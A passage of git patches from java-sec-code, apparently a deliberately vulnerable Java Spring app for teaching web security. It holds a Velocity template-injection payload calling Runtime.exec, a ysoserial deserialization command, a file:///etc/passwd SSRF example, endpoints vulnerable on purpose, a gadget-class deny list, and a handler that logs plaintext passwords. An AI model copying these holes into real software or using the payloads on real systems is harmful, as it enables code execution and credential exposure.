+     * http://localhost:8080/ssti/velocity?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22open%20-a%20Calculator%22)
+     *
+     * @param template exp
+     */
+    @GetMapping("/velocity")
+    private static void velocity(String template){
+        Velocity.init();
+
+        VelocityContext context = new VelocityContext();
+
+        context.put("author", "Elliot A.");
+        context.put("address", "217 E Broadway");
+        context.put("phone", "555-1337");
+
+        StringWriter swOut = new StringWriter();
+        Velocity.evaluate(context, swOut, "test", template);
+    }
+}
diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java
index b7374f1d..902b2269 100644
--- a/src/main/java/org/joychou/controller/Test.java
+++ b/src/main/java/org/joychou/controller/Test.java
@@ -5,6 +5,7 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 
 import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 
 @Controller
@@ -13,8 +14,9 @@ public class Test {
 
     @RequestMapping(value = "/")
     @ResponseBody
-    private String Index(HttpServletResponse response) {
+    private String Index(HttpServletResponse response, String empId) {
 
+        System.out.println(empId);
         Cookie cookie = new Cookie("XSRF-TOKEN", "123");
         cookie.setDomain("taobao.com");
         cookie.setMaxAge(-1); // forever time
diff --git a/src/main/java/org/joychou/mapper/UserMapper.java b/src/main/java/org/joychou/mapper/UserMapper.java
index 33114048..36c2f734 100644
--- a/src/main/java/org/joychou/mapper/UserMapper.java
+++ b/src/main/java/org/joychou/mapper/UserMapper.java
@@ -8,7 +8,10 @@
 @Mapper
 public interface UserMapper {
 
-    // If using simple sql, we can use annotation.
+    /**
+     * If using simple sql, we can use annotation. Such as @Select @Update.
+     * If using ${username}, application will send a error.
+     */
     @Select("select * from users where username = #{username}")
     User findByUserName(@Param("username") String username);
 
diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java
new file mode 100644
index 00000000..d837b4c1
--- /dev/null
+++ b/src/main/java/org/joychou/security/AntObjectInputStream.java
@@ -0,0 +1,78 @@
+package org.joychou.security;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+import java.io.*;
+
+/**
+ * RASP：Hook java/io/ObjectInputStream类的resolveClass方法
+ * RASP: https://github.com/baidu/openrasp/blob/master/agent/java/engine/src/main/java/com/baidu/openrasp/hook/DeserializationHook.java
+ *
+ * Run main method to test.
+ */
+public class AntObjectInputStream extends ObjectInputStream {
+
+    private final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class);
+
+    public AntObjectInputStream(InputStream inputStream) throws IOException {
+        super(inputStream);
+    }
+
+    /**
+     * 只允许反序列化SerialObject class
+     *
+     * 在应用上使用黑白名单校验方案比较局限，因为只有使用自己定义的AntObjectInputStream类，进行反序列化才能进行校验。
+     * 类似fastjson通用类的反序列化就不能校验。
+     * 但是RASP是通过HOOK java/io/ObjectInputStream类的resolveClass方法，全局的检测白名单。
+     *
+     */
+    @Override
+    protected Class<?> resolveClass(final ObjectStreamClass desc)
+            throws IOException, ClassNotFoundException
+    {
+        String className = desc.getName();
+
+        // Deserialize class name: org.joychou.security.AntObjectInputStream$MyObject
+        logger.info("Deserialize class name: " + className);
+
+        String[] denyClasses = {"java.net.InetAddress", "org.apache.commons.collections.Transformer"};
+
+        for (String denyClass : denyClasses) {
+            if (className.startsWith(denyClass)) {
+                throw new InvalidClassException("Unauthorized deserialization attempt", className);
+            }
+        }
+
+        return super.resolveClass(desc);
+    }
+
+    public static void main(String args[]) throws Exception{
+        // 定义myObj对象
+        MyObject myObj = new MyObject();
+        myObj.name = "world";
+
+        // 创建一个包含对象进行反序列化信息的/tmp/object数据文件
+        FileOutputStream fos = new FileOutputStream("/tmp/object");
+        ObjectOutputStream os = new ObjectOutputStream(fos);
+
+        // writeObject()方法将myObj对象写入/tmp/object文件
+        os.writeObject(myObj);
+        os.close();
+
+        // 从文件中反序列化obj对象
+        FileInputStream fis = new FileInputStream("/tmp/object");
+        AntObjectInputStream ois = new AntObjectInputStream(fis);  // AntObjectInputStream class
+
+        //恢复对象即反序列化
+        MyObject objectFromDisk = (MyObject)ois.readObject();
+        System.out.println(objectFromDisk.name);
+        ois.close();
+    }
+
+    static class  MyObject implements Serializable {
+        public String name;
+    }
+}
+
+
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index c37be3fa..9cf68432 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -24,7 +24,7 @@ joychou.security.referer.uri = /jsonp/**
 # csrf token check
 joychou.security.csrf.enabled = true
 # URI without CSRF check (only support ANT url format)
-joychou.security.csrf.exclude.url = /xxe/**, /fastjon/**
+joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**
 # method for CSRF check
 joychou.security.csrf.method = POST
 ### csrf configuration ends ###

From cc99e47c740c029a97ef0aa7d0dee2e2694138d1 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 19 Jul 2019 17:33:37 +0800
Subject: [PATCH 040/108] udpate readme

---
 README.md                                      | 1 +
 README_zh.md                                   | 1 +
 src/main/java/org/joychou/controller/SSTI.java | 6 ++++--
 3 files changed, 6 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 3b35747f..6f2e11f2 100644
--- a/README.md
+++ b/README.md
@@ -46,6 +46,7 @@ Sort by letter.
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
 - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF)
+- [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
diff --git a/README_zh.md b/README_zh.md
index 70bbaedf..9ae1820f 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -43,6 +43,7 @@
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
 - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/wiki/SSRF)
+- [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
diff --git a/src/main/java/org/joychou/controller/SSTI.java b/src/main/java/org/joychou/controller/SSTI.java
index 7e9d2edb..70e7c7a6 100644
--- a/src/main/java/org/joychou/controller/SSTI.java
+++ b/src/main/java/org/joychou/controller/SSTI.java
@@ -15,9 +15,11 @@
 public class SSTI {
 
     /**
-     * SSTI of Java velocity.
-     * Open a calculator in MacOS.
+     * SSTI of Java velocity. The latest Velocity version still has this problem.
+     * Fix method: Avoid to use Velocity.evaluate method.
+     *
      * http://localhost:8080/ssti/velocity?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22open%20-a%20Calculator%22)
+     * Open a calculator in MacOS.
      *
      * @param template exp
      */

From 31f51708ed3de9c101093ad38712f54728704e34 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Sat, 20 Jul 2019 12:24:28 +0800
Subject: [PATCH 041/108] add deserialize

---
 java-sec-code.iml                             |   2 +-
 .../org/joychou/controller/Deserialize.java   | 104 ++++++++++++++----
 .../java/org/joychou/controller/SSRF.java     |   3 +
 .../security/AntObjectInputStream.java        |   4 +-
 4 files changed, 91 insertions(+), 22 deletions(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 9cb2ac16..0278f6c0 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -12,7 +12,7 @@
       </configuration>
     </facet>
   </component>
-  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_6">
+  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
     <output url="file://$MODULE_DIR$/target/classes" />
     <output-test url="file://$MODULE_DIR$/target/test-classes" />
     <content url="file://$MODULE_DIR$">
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 964a7777..d597087c 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,35 +1,99 @@
 package org.joychou.controller;
 
-
-import org.springframework.stereotype.Controller;
+import org.apache.commons.lang.StringUtils;
+import org.joychou.security.AntObjectInputStream;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 
+import javax.servlet.http.Cookie;
 import javax.servlet.http.HttpServletRequest;
-import java.io.InputStream;
+import java.io.ByteArrayInputStream;
+import java.io.IOException;
 import java.io.ObjectInputStream;
+import java.util.Base64;
 
 /**
- * @author JoyChou (joychou@joychou.org)
- * @Date   2018年06月14日
- * @Desc   该应用必须有Commons-Collections包才能利用反序列化命令执行。
+ * Deserialize RCE using Commons-Collections gadget.
+ *
+ * @author JoyChou @2018-06-14
  */
-
-@Controller
+@RestController
 @RequestMapping("/deserialize")
 public class Deserialize {
 
-    @RequestMapping("/test")
-    @ResponseBody
-    public static String deserialize_test(HttpServletRequest request) throws Exception{
-        try {
-            InputStream iii = request.getInputStream();
-            ObjectInputStream in = new ObjectInputStream(iii);
-            in.readObject();  // 触发漏洞
-            in.close();
-            return "test";
-        }catch (Exception e){
-            return "exception";
+
+    private static Logger logger= LoggerFactory.getLogger(Deserialize.class);
+
+    /**
+     * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
+     * Add the result to rememberMe cookie.
+     *
+     * http://localhost:8080/deserialize/rememberMe/vul
+     */
+    @RequestMapping("/rememberMe/vul")
+    public static String rememberMeVul(HttpServletRequest request)
+            throws IOException, ClassNotFoundException {
+
+        Cookie[] cookies = request.getCookies();
+        String rememberMe = "";
+
+        if (null == cookies) {
+            logger.info("No cookies.");
+        } else {
+            for (Cookie cookie : cookies) {
+                if ( cookie.getName().equals("rememberMe") ) {
+                    rememberMe = cookie.getValue();
+                }
+            }
+        }
+
+        if (StringUtils.isBlank(rememberMe) ) {
+            return "No rememberMe cookie. Right?";
         }
+
+        byte[] decoded = Base64.getDecoder().decode(rememberMe);
+        ByteArrayInputStream bytes = new ByteArrayInputStream(decoded);
+        ObjectInputStream in = new ObjectInputStream(bytes);
+        in.readObject();
+        in.close();
+
+        return "Are u ok?";
+    }
+
+    /**
+     * Check deserialize class using black list.
+     *
+     * http://localhost:8080/deserialize/rememberMe/security
+     */
+    @RequestMapping("/rememberMe/security")
+    public static String rememberMeBlackClassCheck(HttpServletRequest request)
+            throws IOException, ClassNotFoundException {
+
+        Cookie[] cookies = request.getCookies();
+        String rememberMe = "";
+
+        if (null == cookies) {
+            logger.info("No cookies in /rememberMe/security");
+        } else {
+            for (Cookie cookie : cookies) {
+                if ( cookie.getName().equals("rememberMe") ) {
+                    rememberMe = cookie.getValue();
+                }
+            }
+        }
+
+        if (StringUtils.isBlank(rememberMe) ) {
+            return "No rememberMe cookie. Right?";
+        }
+
+        byte[] decoded = Base64.getDecoder().decode(rememberMe);
+        ByteArrayInputStream bytes = new ByteArrayInputStream(decoded);
+        AntObjectInputStream in = new AntObjectInputStream(bytes);
+        in.readObject();
+        in.close();
+
+        return "I'm very OK.";
     }
 }
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index f774fb27..fec5cf23 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -103,6 +103,9 @@ public static String ssrf_Request(HttpServletRequest request)
      * Download the url file.
      * http://localhost:8080/ssrf/openStream?url=file:///etc/passwd
      *
+     * new URL(String url).openConnection()
+     * new URL(String url).openStream()
+     * new URL(String url).getContent()
      */
     @RequestMapping("/openStream")
     @ResponseBody
diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java
index d837b4c1..b15d7589 100644
--- a/src/main/java/org/joychou/security/AntObjectInputStream.java
+++ b/src/main/java/org/joychou/security/AntObjectInputStream.java
@@ -36,7 +36,9 @@ protected Class<?> resolveClass(final ObjectStreamClass desc)
         // Deserialize class name: org.joychou.security.AntObjectInputStream$MyObject
         logger.info("Deserialize class name: " + className);
 
-        String[] denyClasses = {"java.net.InetAddress", "org.apache.commons.collections.Transformer"};
+        String[] denyClasses = {"java.net.InetAddress",
+                                "org.apache.commons.collections.Transformer",
+                                "org.apache.commons.collections.functors"};
 
         for (String denyClass : denyClasses) {
             if (className.startsWith(denyClass)) {

From 0a9c97825e216fed465f267a545ce365f751bc73 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Sat, 20 Jul 2019 12:25:56 +0800
Subject: [PATCH 042/108] update readme

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index 6f2e11f2..b273bf10 100644
--- a/README.md
+++ b/README.md
@@ -41,6 +41,7 @@ Sort by letter.
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
 - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
+- [Deserialize](https://github.com/JoyChou93/java-sec-code/wiki/Deserialize)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)

From 4763a3a3938d3e0b0775dc0ffb895e7fe13ce7b9 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Sat, 20 Jul 2019 12:26:26 +0800
Subject: [PATCH 043/108] update readme

---
 README_zh.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README_zh.md b/README_zh.md
index 9ae1820f..88d31149 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -38,6 +38,7 @@
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
 - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
+- [Deserialize](https://github.com/JoyChou93/java-sec-code/wiki/Deserialize)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/wiki/Java-RMI)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)

From 8a9977d02a03ac62ab6aad8e96d8534e4c443478 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 22 Jul 2019 00:07:50 +0800
Subject: [PATCH 044/108] add auth

---
 README.md                                     |  21 ++++
 README_zh.md                                  |  20 ++++
 .../java/org/joychou/controller/CORS.java     |  14 +--
 .../java/org/joychou/controller/CSRF.java     |  12 +-
 .../java/org/joychou/controller/Index.java    |  10 +-
 .../java/org/joychou/controller/Login.java    |  58 ++++++++++
 .../org/joychou/controller/jsonp/JSONP.java   |  32 ++++--
 .../security/AntObjectInputStream.java        |   2 +-
 .../security/CsrfAccessDeniedHandler.java     |   2 +-
 .../joychou/security/LoginFailureHandler.java |  32 ++++++
 .../joychou/security/LoginSuccessHandler.java |  30 +++++
 .../org/joychou/security/SecurityUtil.java    |   2 -
 .../joychou/security/WebSecurityConfig.java   |  27 ++++-
 src/main/resources/application.properties     |   2 +-
 src/main/resources/static/css/login.css       | 106 ++++++++++++++++++
 .../resources/static/js/jquery-1.11.1.min.js  |   4 +
 src/main/resources/templates/csrfTest.html    |  27 -----
 src/main/resources/templates/form.html        |  19 ++++
 src/main/resources/templates/login.html       |  41 +++++++
 19 files changed, 397 insertions(+), 64 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Login.java
 create mode 100644 src/main/java/org/joychou/security/LoginFailureHandler.java
 create mode 100644 src/main/java/org/joychou/security/LoginSuccessHandler.java
 create mode 100644 src/main/resources/static/css/login.css
 create mode 100644 src/main/resources/static/js/jquery-1.11.1.min.js
 delete mode 100644 src/main/resources/templates/csrfTest.html
 create mode 100644 src/main/resources/templates/form.html
 create mode 100644 src/main/resources/templates/login.html

diff --git a/README.md b/README.md
index b273bf10..77dfd32f 100644
--- a/README.md
+++ b/README.md
@@ -11,6 +11,27 @@ This project can also be called Java vulnerability code.
 
 Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments.
 
+## Authenticate
+
+### Login
+
+[http://localhost:8080/login](http://localhost:8080/login)
+
+If you are not logged in, accessing any page will redirect you to the login page. The username & password are as follows.
+
+```
+admin/admin123
+joychou/joychou123
+```
+
+### Logout
+
+[http://localhost:8080/logout](http://localhost:8080/logout)
+
+### RememberMe
+
+Tomcat's default JSESSION session is valid for 30 minutes, so a 30-minute non-operational session will expire. In order to solve this problem, the rememberMe function is introduced, and the default expiration time is 2 weeks.
+
 ## Vulnerability Code
 
 Sort by letter.
diff --git a/README_zh.md b/README_zh.md
index 88d31149..f94932a1 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -10,6 +10,26 @@
 
 每个漏洞类型代码默认存在安全漏洞（除非本身不存在漏洞），相关修复代码在注释里。具体可查看每个漏洞代码和注释。
 
+## 认证
+
+### 登录
+
+[http://localhost:8080/login](http://localhost:8080/login)
+
+如果未登录，访问任何页面都会重定向到login页面。用户名和密码如下。
+
+```
+admin/admin123
+joychou/joychou123
+```
+### 登出
+
+[http://localhost:8080/logout](http://localhost:8080/logout)
+
+### 记住我
+
+Tomcat默认JSESSION会话有效时间为30分钟，所以30分钟不操作会话将过期。为了解决这一问题，引入rememberMe功能，默认过期时间为2周。
+
 ## 漏洞代码
 
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml)
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index 6c8d5625..bf93c7ce 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -1,10 +1,10 @@
 package org.joychou.controller;
 
 import org.joychou.security.SecurityUtil;
-import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.CrossOrigin;
 import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
+import org.joychou.controller.jsonp.JSONP;
+import org.springframework.web.bind.annotation.RestController;
 
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
@@ -15,7 +15,7 @@
  * @desc    https://github.com/JoyChou93/java-sec-code/wiki/CORS
  */
 
-@Controller
+@RestController
 @RequestMapping("/cors")
 public class CORS {
 
@@ -23,7 +23,6 @@ public class CORS {
     protected static String[] urlwhitelist = {"joychou.com", "joychou.me"};
 
     @RequestMapping("/vuls1")
-    @ResponseBody
     private static String vuls1(HttpServletRequest request, HttpServletResponse response) {
         // 获取Header中的Origin
         String origin = request.getHeader("origin");
@@ -33,7 +32,6 @@ private static String vuls1(HttpServletRequest request, HttpServletResponse resp
     }
 
     @RequestMapping("/vuls2")
-    @ResponseBody
     private static String vuls2(HttpServletResponse response) {
         // 不建议设置为*
         // 后端设置Access-Control-Allow-Origin为*的情况下，跨域的时候前端如果设置withCredentials为true会异常
@@ -43,15 +41,13 @@ private static String vuls2(HttpServletResponse response) {
 
     @CrossOrigin("*")
     @RequestMapping("/vuls3")
-    @ResponseBody
     private static String vuls3(HttpServletResponse response) {
         return info;
     }
 
 
     @RequestMapping("/sec")
-    @ResponseBody
-    private static String seccode(HttpServletRequest request, HttpServletResponse response) {
+    public String seccode(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("Origin");
 
         // 如果origin不为空并且origin不在白名单内，认定为不安全。
@@ -61,7 +57,7 @@ private static String seccode(HttpServletRequest request, HttpServletResponse re
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
         response.setHeader("Access-Control-Allow-Credentials", "true");
-        return info;
+        return JSONP.getUserInfo(request);
     }
 
 
diff --git a/src/main/java/org/joychou/controller/CSRF.java b/src/main/java/org/joychou/controller/CSRF.java
index ea33c59e..5481260e 100644
--- a/src/main/java/org/joychou/controller/CSRF.java
+++ b/src/main/java/org/joychou/controller/CSRF.java
@@ -7,20 +7,18 @@
 import org.springframework.web.bind.annotation.ResponseBody;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2019.05.31
- * @desc    check csrf using spring-security
- * @usage   Access http://localhost:8080/csrf/ -> click submit
+ * check csrf using spring-security
+ * Access http://localhost:8080/csrf/ -> click submit
+ *
+ * @author  JoyChou (joychou@joychou.org) @2019-05-31
  */
-
-
 @Controller
 @RequestMapping("/csrf")
 public class CSRF {
 
     @GetMapping("/")
     public String index() {
-        return "csrfTest";
+        return "form";
     }
 
     @PostMapping("/post")
diff --git a/src/main/java/org/joychou/controller/Index.java b/src/main/java/org/joychou/controller/Index.java
index 4f2fab99..e38761d1 100644
--- a/src/main/java/org/joychou/controller/Index.java
+++ b/src/main/java/org/joychou/controller/Index.java
@@ -6,6 +6,7 @@
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 
+import javax.servlet.http.HttpServletRequest;
 import java.util.HashMap;
 import java.util.Map;
 
@@ -18,11 +19,14 @@
 
 @Controller
 public class Index {
-    @RequestMapping("/")
+    @RequestMapping("/index")
     @ResponseBody
-    public static String index() {
+    public static String index(HttpServletRequest request) {
+        String username = request.getUserPrincipal().getName();
         Map m = new HashMap();
-        m.put("app_name", "java_vul_code");
+        m.put("username", username);
+        m.put("login", "success");
+        m.put("app_name", "java security code");
         m.put("java_version", System.getProperty("java.version"));
         m.put("fastjson_version", JSON.VERSION);
 
diff --git a/src/main/java/org/joychou/controller/Login.java b/src/main/java/org/joychou/controller/Login.java
new file mode 100644
index 00000000..7983efcd
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Login.java
@@ -0,0 +1,58 @@
+package org.joychou.controller;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.security.core.Authentication;
+import org.springframework.security.core.context.SecurityContextHolder;
+import org.springframework.security.web.authentication.logout.SecurityContextLogoutHandler;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+
+@Controller
+public class Login {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    @RequestMapping("/login")
+    public String login() {
+        return "login";
+    }
+
+    @GetMapping("/logout")
+    public String logoutPage (HttpServletRequest request, HttpServletResponse response) {
+
+        String username = request.getUserPrincipal().getName();
+
+        Authentication auth = SecurityContextHolder.getContext().getAuthentication();
+        if (auth != null) {
+            new SecurityContextLogoutHandler().logout(request, response, auth);
+        }
+
+        String[] deleteCookieKey = {"JSESSIONID", "remember-me"}; // delete cookie
+        for (String key : deleteCookieKey) {
+            Cookie cookie = new Cookie(key, null);
+            cookie.setMaxAge(0);
+            cookie.setPath("/");
+            response.addCookie(cookie);
+        }
+
+        if (null == request.getUserPrincipal()) {
+            logger.info("User " + username + " logout successfully.");
+        } else {
+            logger.info("User " + username + " logout failed. Please try again.");
+        }
+
+        return "redirect:/login?logout";
+    }
+
+    @RequestMapping("/")
+    public String redirect() {
+        return "redirect:/index";
+    }
+}
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index 2f474440..9c7eac25 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -7,7 +7,9 @@
 import org.springframework.web.bind.annotation.*;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
-
+import java.security.Principal;
+import java.util.HashMap;
+import java.util.Map;
 
 
 /**
@@ -19,10 +21,20 @@
 @RequestMapping("/jsonp")
 public class JSONP {
 
-    private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
     private static String[] urlwhitelist = {"joychou.com", "joychou.org"};
 
 
+    // get current login username
+    public static String getUserInfo(HttpServletRequest request) {
+        Principal principal = request.getUserPrincipal();
+
+        String username = principal.getName();
+
+        Map m = new HashMap();
+        m.put("Username", username);
+
+        return JSON.toJSONString(m);
+    }
     /**
      * Set the response content-type to application/javascript.
      *
@@ -30,9 +42,9 @@ public class JSONP {
      *
      */
     @RequestMapping(value = "/referer", produces = "application/javascript")
-    private static String referer(HttpServletRequest request, HttpServletResponse response) {
+    private String referer(HttpServletRequest request, HttpServletResponse response) {
         String callback = request.getParameter("callback");
-        return callback + "(" + info + ")";
+        return callback + "(" + getUserInfo(request) + ")";
     }
 
     /**
@@ -43,7 +55,7 @@ private static String referer(HttpServletRequest request, HttpServletResponse re
      *
      */
     @RequestMapping(value = "/emptyReferer", produces = "application/javascript")
-    private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
+    private String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
         String referer = request.getHeader("referer");
 
         if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
@@ -51,7 +63,7 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon
         }
 
         String callback = request.getParameter("callback");
-        return callback + "(" + info + ")";
+        return callback + "(" + getUserInfo(request) + ")";
     }
 
     /**
@@ -63,8 +75,8 @@ private static String emptyReferer(HttpServletRequest request, HttpServletRespon
      *         Such as JSONOjbect or JavaBean. String type cannot be used.
      */
     @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE)
-    public JSONObject advice() {
-        return JSON.parseObject(info);
+    public JSONObject advice(HttpServletRequest request) {
+        return JSON.parseObject(getUserInfo(request));
 
     }
 
@@ -73,7 +85,7 @@ public JSONObject advice() {
      * http://localhost:8080/jsonp/sec?callback=test
      */
     @RequestMapping(value = "/sec", produces = "application/javascript")
-    private static String safecode(HttpServletRequest request, HttpServletResponse response) {
+    private String safecode(HttpServletRequest request, HttpServletResponse response) {
         String referer = request.getHeader("referer");
 
         if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) {
@@ -81,7 +93,7 @@ private static String safecode(HttpServletRequest request, HttpServletResponse r
         }
 
         String callback = request.getParameter("callback");
-        return callback + "(" + info + ")";
+        return callback + "(" + getUserInfo(request) + ")";
     }
 
 
diff --git a/src/main/java/org/joychou/security/AntObjectInputStream.java b/src/main/java/org/joychou/security/AntObjectInputStream.java
index b15d7589..ef332360 100644
--- a/src/main/java/org/joychou/security/AntObjectInputStream.java
+++ b/src/main/java/org/joychou/security/AntObjectInputStream.java
@@ -13,7 +13,7 @@
  */
 public class AntObjectInputStream extends ObjectInputStream {
 
-    private final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class);
+    protected final Logger logger= LoggerFactory.getLogger(AntObjectInputStream.class);
 
     public AntObjectInputStream(InputStream inputStream) throws IOException {
         super(inputStream);
diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index 65d9e6f3..8471ea0c 100644
--- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -19,7 +19,7 @@
  */
 public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
-    private final Logger logger= LoggerFactory.getLogger(CsrfAccessDeniedHandler.class);
+    protected final Logger logger= LoggerFactory.getLogger(this.getClass());
 
     @Override
     public void handle(HttpServletRequest request, HttpServletResponse response,
diff --git a/src/main/java/org/joychou/security/LoginFailureHandler.java b/src/main/java/org/joychou/security/LoginFailureHandler.java
new file mode 100644
index 00000000..ab3329e1
--- /dev/null
+++ b/src/main/java/org/joychou/security/LoginFailureHandler.java
@@ -0,0 +1,32 @@
+package org.joychou.security;
+
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.http.MediaType;
+import org.springframework.security.core.AuthenticationException;
+import org.springframework.security.web.authentication.AuthenticationFailureHandler;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+
+
+public class LoginFailureHandler implements AuthenticationFailureHandler {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    @Override
+    public void onAuthenticationFailure(HttpServletRequest request,
+                                        HttpServletResponse response, AuthenticationException exception)
+                                        throws ServletException, IOException {
+
+        logger.info("Login failed. " + request.getRequestURL() +
+                " username: " + request.getParameter("username") +
+                " password: " + request.getParameter("password") );
+
+        response.setContentType(MediaType.APPLICATION_JSON_VALUE);
+        response.getWriter().write("{\"code\":0, \"message\":\"Login failed.\"}");
+    }
+
+}
diff --git a/src/main/java/org/joychou/security/LoginSuccessHandler.java b/src/main/java/org/joychou/security/LoginSuccessHandler.java
new file mode 100644
index 00000000..05b7cb2c
